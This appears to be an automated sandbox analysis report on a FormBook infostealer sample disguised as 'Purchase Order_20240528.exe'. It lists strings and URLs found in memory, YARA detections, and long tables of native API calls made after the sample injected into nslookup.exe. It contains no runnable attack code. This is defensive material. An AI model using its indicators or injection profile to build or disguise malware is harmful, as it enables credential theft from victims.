        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: nslookup.exe, 00000005.00000003.2406968840.0000000007B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4534212709.0000000002B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: nslookup.exe, 00000005.00000002.4534212709.0000000002B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
        Source: Purchase Order_20240528.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
        Source: nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: nslookup.exe, 00000005.00000002.4540879237.000000000427C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.000000000352C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/allgiftedmalaysia.com?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=expired
        Source: nslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
        Source: nslookup.exe, 00000005.00000002.4540879237.0000000003F58000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003208000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        .NET source code contains very large array initializations
        Source: 0.2.Purchase Order_20240528.exe.2815b80.0.raw.unpack, .csLarge array initialization: : array initializer size 27104
        Source: 0.2.Purchase Order_20240528.exe.5280000.6.raw.unpack, .csLarge array initialization: : array initializer size 27104
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: Purchase Order_20240528.exe
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622B60 NtClose,LdrInitializeThunk,3_2_01622B60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01622DF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01622C70
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016235C0 NtCreateMutant,LdrInitializeThunk,3_2_016235C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01624340 NtSetContextThread,3_2_01624340
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01624650 NtSuspendThread,3_2_01624650
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622BE0 NtQueryValueKey,3_2_01622BE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622BF0 NtAllocateVirtualMemory,3_2_01622BF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622BA0 NtEnumerateValueKey,3_2_01622BA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622B80 NtQueryInformationFile,3_2_01622B80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622AF0 NtWriteFile,3_2_01622AF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622AD0 NtReadFile,3_2_01622AD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622AB0 NtWaitForSingleObject,3_2_01622AB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622D30 NtUnmapViewOfSection,3_2_01622D30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622D00 NtSetInformationFile,3_2_01622D00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622D10 NtMapViewOfSection,3_2_01622D10
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622DD0 NtDelayExecution,3_2_01622DD0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622DB0 NtEnumerateKey,3_2_01622DB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622C60 NtCreateKey,3_2_01622C60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622C00 NtQueryInformationProcess,3_2_01622C00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622CF0 NtOpenProcess,3_2_01622CF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622CC0 NtQueryVirtualMemory,3_2_01622CC0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622CA0 NtQueryInformationToken,3_2_01622CA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622F60 NtCreateProcessEx,3_2_01622F60
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622F30 NtCreateSection,3_2_01622F30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622FE0 NtCreateFile,3_2_01622FE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622FA0 NtQuerySection,3_2_01622FA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622FB0 NtResumeThread,3_2_01622FB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622F90 NtProtectVirtualMemory,3_2_01622F90
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622E30 NtWriteVirtualMemory,3_2_01622E30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622EE0 NtQueueApcThread,3_2_01622EE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622EA0 NtAdjustPrivilegesToken,3_2_01622EA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622E80 NtReadVirtualMemory,3_2_01622E80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01623010 NtOpenDirectoryObject,3_2_01623010
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01623090 NtSetValueKey,3_2_01623090
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016239B0 NtGetContextThread,3_2_016239B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01623D70 NtOpenThread,3_2_01623D70
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01623D10 NtOpenProcessToken,3_2_01623D10
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0042B543 NtClose,3_2_0042B543
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F4340 NtSetContextThread,LdrInitializeThunk,5_2_031F4340
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F4650 NtSuspendThread,LdrInitializeThunk,5_2_031F4650
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2B60 NtClose,LdrInitializeThunk,5_2_031F2B60
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2AD0 NtReadFile,LdrInitializeThunk,5_2_031F2AD0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2AF0 NtWriteFile,LdrInitializeThunk,5_2_031F2AF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2F30 NtCreateSection,LdrInitializeThunk,5_2_031F2F30
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2FB0 NtResumeThread,LdrInitializeThunk,5_2_031F2FB0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2FE0 NtCreateFile,LdrInitializeThunk,5_2_031F2FE0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_031F2EE0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_031F2D10
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_031F2D30
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2DD0 NtDelayExecution,LdrInitializeThunk,5_2_031F2DD0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_031F2DF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_031F2C70
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2C60 NtCreateKey,LdrInitializeThunk,5_2_031F2C60
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_031F2CA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F35C0 NtCreateMutant,LdrInitializeThunk,5_2_031F35C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F39B0 NtGetContextThread,LdrInitializeThunk,5_2_031F39B0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2B80 NtQueryInformationFile,5_2_031F2B80
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2BA0 NtEnumerateValueKey,5_2_031F2BA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2BF0 NtAllocateVirtualMemory,5_2_031F2BF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2BE0 NtQueryValueKey,5_2_031F2BE0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2AB0 NtWaitForSingleObject,5_2_031F2AB0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2F60 NtCreateProcessEx,5_2_031F2F60
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2F90 NtProtectVirtualMemory,5_2_031F2F90
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2FA0 NtQuerySection,5_2_031F2FA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2E30 NtWriteVirtualMemory,5_2_031F2E30
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2E80 NtReadVirtualMemory,5_2_031F2E80
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2EA0 NtAdjustPrivilegesToken,5_2_031F2EA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2D00 NtSetInformationFile,5_2_031F2D00
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2DB0 NtEnumerateKey,5_2_031F2DB0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2C00 NtQueryInformationProcess,5_2_031F2C00
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2CC0 NtQueryVirtualMemory,5_2_031F2CC0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F2CF0 NtOpenProcess,5_2_031F2CF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F3010 NtOpenDirectoryObject,5_2_031F3010
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F3090 NtSetValueKey,5_2_031F3090
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F3D10 NtOpenProcessToken,5_2_031F3D10
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F3D70 NtOpenThread,5_2_031F3D70
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A77E60 NtDeleteFile,5_2_02A77E60
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A77F00 NtClose,5_2_02A77F00
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A77C10 NtCreateFile,5_2_02A77C10
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A77D70 NtReadFile,5_2_02A77D70
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_00E1E2EC0_2_00E1E2EC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D144580_2_06D14458
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D124780_2_06D12478
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D193100_2_06D19310
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D120400_2_06D12040
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D120300_2_06D12030
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D11C080_2_06D11C08
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 0_2_06D13B800_2_06D13B80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016781583_2_01678158
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E01003_2_015E0100
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168A1183_2_0168A118
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A81CC3_2_016A81CC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B01AA3_2_016B01AA
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A41A23_2_016A41A2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016820003_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AA3523_2_016AA352
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B03E63_2_016B03E6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE3F03_2_015FE3F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016902743_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016702C03_2_016702C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F05353_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B05913_2_016B0591
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A24463_2_016A2446
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016944203_2_01694420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169E4F63_2_0169E4F6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F07703_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016147503_2_01614750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EC7C03_2_015EC7C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160C6E03_2_0160C6E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016069623_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016BA9A63_2_016BA9A6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A03_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F28403_2_015F2840
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FA8403_2_015FA840
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E8F03_2_0161E8F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D68B83_2_015D68B8
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AAB403_2_016AAB40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A6BD73_2_016A6BD7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EEA803_2_015EEA80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FAD003_2_015FAD00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168CD1F3_2_0168CD1F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EADE03_2_015EADE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01608DBF3_2_01608DBF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0C003_2_015F0C00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0CF23_2_015E0CF2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690CB53_2_01690CB5
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01664F403_2_01664F40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01632F283_2_01632F28
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01610F303_2_01610F30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01692F303_2_01692F30
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E2FC83_2_015E2FC8
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FCFE03_2_015FCFE0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166EFA03_2_0166EFA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0E593_2_015F0E59
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AEE263_2_016AEE26
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AEEDB3_2_016AEEDB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602E903_2_01602E90
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016ACE933_2_016ACE93
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016BB16B3_2_016BB16B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162516C3_2_0162516C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DF1723_2_015DF172
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FB1B03_2_015FB1B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A70E93_2_016A70E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AF0E03_2_016AF0E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F70C03_2_015F70C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169F0CC3_2_0169F0CC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DD34C3_2_015DD34C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A132D3_2_016A132D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0163739A3_2_0163739A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016912ED3_2_016912ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160B2C03_2_0160B2C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F52A03_2_015F52A0
